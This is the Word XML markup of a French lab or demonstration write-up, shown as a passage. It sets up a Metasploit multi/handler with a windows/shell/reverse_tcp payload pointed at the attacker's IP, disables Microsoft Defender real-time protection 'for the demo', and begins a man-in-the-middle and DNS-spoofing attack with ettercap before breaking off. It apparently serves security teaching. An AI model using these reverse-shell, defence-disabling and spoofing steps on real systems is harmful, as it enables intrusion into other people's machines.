          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C6C23D6" wp14:editId="4E3B8A82">
            <wp:extent cx="5759450" cy="4192905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57" name="Picture 5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ex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4192905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7F2210" w14:textId="77777777" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00087C41"/>
    <w:p w14:paraId="7EE35A75" w14:textId="4E7C64DF" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00087C41">
      <w:r>
        <w:t>Puis suivant votre cas, nous démarrons ou rechargeons la configuration d’</w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>pache</w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A6AFC2" w14:textId="21C68DEC" w:rsidR="00930EB0" w:rsidRPr="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00930EB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00930EB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> start apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5E2A7C" w14:textId="77777777" w:rsidR="00426C00" w:rsidRPr="00930EB0" w:rsidRDefault="00426C00" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B27D18" w14:textId="6106D01C" w:rsidR="00426C00" w:rsidRPr="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00930EB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00930EB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> reload apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590FF268" w14:textId="77777777" w:rsidR="00087C41" w:rsidRDefault="00087C41" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C286F9F" w14:textId="77777777" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C1FCB6" w14:textId="77777777" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD80522" w14:textId="77777777" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C1D8300" w14:textId="77777777" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DEEEAAE" w14:textId="77777777" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7160EDA2" w14:textId="77777777" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74ECB789" w14:textId="77777777" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20EF7E6F" w14:textId="77777777" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD7DDDC" w14:textId="77777777" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11EDA52E" w14:textId="77777777" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C792B2F" w14:textId="77777777" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27DDE5E5" w14:textId="77777777" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66AAC35D" w14:textId="77777777" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0033845E" w14:textId="432F70DD" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="009E4401">
      <w:pPr>
        <w:pStyle w:val="EFmoduletitre"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc133586240"/>
      <w:r w:rsidRPr="009E4401">
        <w:lastRenderedPageBreak/>
        <w:t>Lancement du handler sur M</w:t>
      </w:r>
      <w:r>
        <w:t>etasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="0CF00332" w14:textId="41E79F4D" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="009E4401">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous lançons </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197E4F6F" w14:textId="18877817" w:rsidR="009E4401" w:rsidRPr="009E4401" w:rsidRDefault="009E4401" w:rsidP="009E4401">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r w:rsidRPr="009E4401">
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D8D039" w14:textId="00DC0160" w:rsidR="00087C41" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:r>
        <w:t xml:space="preserve">Et nous lançons la commande de recherche de ce que nous recherchons </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00762CFC" w14:textId="278E0356" w:rsidR="006A767C" w:rsidRPr="009E4401" w:rsidRDefault="009E4401" w:rsidP="00697067">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E4401">
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E4401">
        <w:t xml:space="preserve"> multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667FFEF9" w14:textId="77777777" w:rsidR="00D354EE" w:rsidRDefault="00D354EE" w:rsidP="00697067">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C24D1B5" w14:textId="3538FE49" w:rsidR="006A767C" w:rsidRPr="009E4401" w:rsidRDefault="009E4401" w:rsidP="00697067">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D39B62C" wp14:editId="54CDF89A">
            <wp:extent cx="5759450" cy="1403985"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="64" name="Picture 6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1403985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD28AB4" w14:textId="77777777" w:rsidR="00D354EE" w:rsidRDefault="00D354EE" w:rsidP="00087C41"/>
    <w:p w14:paraId="7BD8757A" w14:textId="34401E2E" w:rsidR="006A767C" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:r>
        <w:t xml:space="preserve">On voit que ce qui nous intéresse est en position 5, donc nous lançons la commande suivante pour utiliser l’exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FF3895" w14:textId="44EBA8FC" w:rsidR="009E4401" w:rsidRPr="009E4401" w:rsidRDefault="009E4401" w:rsidP="009E4401">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r w:rsidRPr="009E4401">
        <w:t>use 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310197AC" w14:textId="77777777" w:rsidR="00D354EE" w:rsidRDefault="00D354EE" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15F72871" w14:textId="14EF078E" w:rsidR="006A767C" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D04EAA8" wp14:editId="356B1F38">
            <wp:extent cx="2407920" cy="23622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7920" cy="236220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FCFA0C" w14:textId="77777777" w:rsidR="00D354EE" w:rsidRDefault="00D354EE" w:rsidP="00087C41"/>
    <w:p w14:paraId="7E862B75" w14:textId="0D830900" w:rsidR="009E4401" w:rsidRDefault="009E4401" w:rsidP="00087C41">
      <w:r>
        <w:t>Nous lançons la commande suivante pour voir les paramètres de l’exploit :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7754E0FC" w14:textId="16439EA6" w:rsidR="009E4401" w:rsidRPr="009E4401" w:rsidRDefault="009E4401" w:rsidP="009E4401">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r w:rsidRPr="009E4401">
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D40FA" w14:textId="77777777" w:rsidR="00D354EE" w:rsidRDefault="00D354EE" w:rsidP="00697067">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="388C5BD7" w14:textId="57D64C69" w:rsidR="00D354EE" w:rsidRDefault="009E4401" w:rsidP="00A70C19">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009E4401">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29ED5B55" wp14:editId="3959B003">
            <wp:extent cx="5759450" cy="2181860"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="66" name="Picture 6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ext&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759450" cy="2181860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BCF000" w14:textId="731BA977" w:rsidR="006A767C" w:rsidRDefault="00697067" w:rsidP="00087C41">
      <w:r>
        <w:t>Tous les paramètre</w:t>
      </w:r>
      <w:r w:rsidR="003411AB">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> marqués en </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:t> sont obligatoire pour le fonctionnement de l’exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A87081" w14:textId="3DD5D865" w:rsidR="00697067" w:rsidRDefault="00697067" w:rsidP="00087C41">
      <w:r>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> par défaut n’est pas celui que nous utilisons donc nous devons mo</w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:t>fi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">er </w:t>
      </w:r>
      <w:r w:rsidR="003411AB">
        <w:t>certains</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:t>paramètres</w:t>
      </w:r>
      <w:r>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507DFA50" w14:textId="35DB3278" w:rsidR="00697067" w:rsidRDefault="00697067" w:rsidP="00697067">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00697067">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>et payload windows/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00697067">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>everse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="707450DF" w14:textId="6E9FA3FA" w:rsidR="006A767C" w:rsidRDefault="00697067" w:rsidP="00697067">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r w:rsidRPr="00697067">
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00697067">
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00697067">
        <w:t xml:space="preserve"> adresse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00697067">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00697067">
        <w:t xml:space="preserve"> de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> la machine attaquante</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10821EBE" w14:textId="3AC01433" w:rsidR="00697067" w:rsidRDefault="00CF329D" w:rsidP="00087C41">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="00697067">
        <w:t>ne fois tous les paramètres configurés, nous laçons le handler via la commande :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074D1BE0" w14:textId="5B4DB8C8" w:rsidR="006A767C" w:rsidRPr="00697067" w:rsidRDefault="00697067" w:rsidP="00697067">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B31F00" w14:textId="7A65CDB5" w:rsidR="006A767C" w:rsidRDefault="00697067" w:rsidP="00697067">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52753F68" wp14:editId="271336E8">
            <wp:extent cx="4521024" cy="845820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="67" name="Picture 6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Graphical user interfac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69799" cy="854945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A7806" w14:textId="77777777" w:rsidR="000C5B4B" w:rsidRDefault="000C5B4B" w:rsidP="00697067">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D8B588" w14:textId="4BCA9ECC" w:rsidR="000C5B4B" w:rsidRDefault="000C5B4B" w:rsidP="000C5B4B">
      <w:pPr>
        <w:pStyle w:val="EFmoduletitre"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc133586241"/>
      <w:r>
        <w:t>Désactivation de Microsoft Defender</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296E1745" w14:textId="0AB3ACCC" w:rsidR="000C5B4B" w:rsidRDefault="000C5B4B" w:rsidP="000C5B4B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour les besoins de cette démo, nous allons désactiver la </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>protection en temp-réel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defender</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8E73B0" w14:textId="1CF69A0C" w:rsidR="000C5B4B" w:rsidRDefault="000C5B4B" w:rsidP="000C5B4B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour cela, se rendre sur la </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>console</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dans l’onglet </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Virus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>threat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>protection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, cliquer sur </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Manage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>setting</w:t>
      </w:r>
      <w:r w:rsidR="00A70C19" w:rsidRPr="00A70C19">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559FC89B" w14:textId="383D9469" w:rsidR="000C5B4B" w:rsidRDefault="000C5B4B" w:rsidP="000C5B4B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000C5B4B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D7354AA" wp14:editId="0EFD7FFF">
            <wp:extent cx="4617720" cy="3245132"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="68" name="Picture 6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phical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4619741" cy="3246552"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F12C62F" w14:textId="77777777" w:rsidR="000C5B4B" w:rsidRDefault="000C5B4B" w:rsidP="000C5B4B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6C7937" w14:textId="7C12AC6D" w:rsidR="000C5B4B" w:rsidRDefault="000C5B4B" w:rsidP="000C5B4B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t>Désactiver la protection en temps-réel en acceptant l’UAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2D6AA2" w14:textId="7DFE23BF" w:rsidR="000C5B4B" w:rsidRPr="000C5B4B" w:rsidRDefault="000C5B4B" w:rsidP="000C5B4B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000C5B4B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19AE498E" wp14:editId="2322428D">
            <wp:extent cx="4536558" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="69" name="Picture 6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Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4545720" cy="1908847"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49403E44" w14:textId="77777777" w:rsidR="00D354EE" w:rsidRPr="00697067" w:rsidRDefault="00D354EE" w:rsidP="00697067">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17FE34A4" w14:textId="5C3EC2F8" w:rsidR="006A767C" w:rsidRDefault="00166A0B" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EF-chapitretitre"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc133586242"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lancement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l’at</w:t>
      </w:r>
      <w:r w:rsidR="000C5B4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aque</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B5D7C4F" w14:textId="2FB4137A" w:rsidR="009D01D6" w:rsidRPr="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFmoduletitre"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc133586243"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Man In The Middle and DNS Spoofing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="13E6A56A" w14:textId="43E04B00" w:rsidR="00166A0B" w:rsidRDefault="00D85598" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour commencer notre attaque, nous nous plaçons en Man In The Middle avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9310C2" w14:textId="59672178" w:rsidR="00D85598" w:rsidRPr="00D85598" w:rsidRDefault="00D85598" w:rsidP="00D85598">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D85598">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
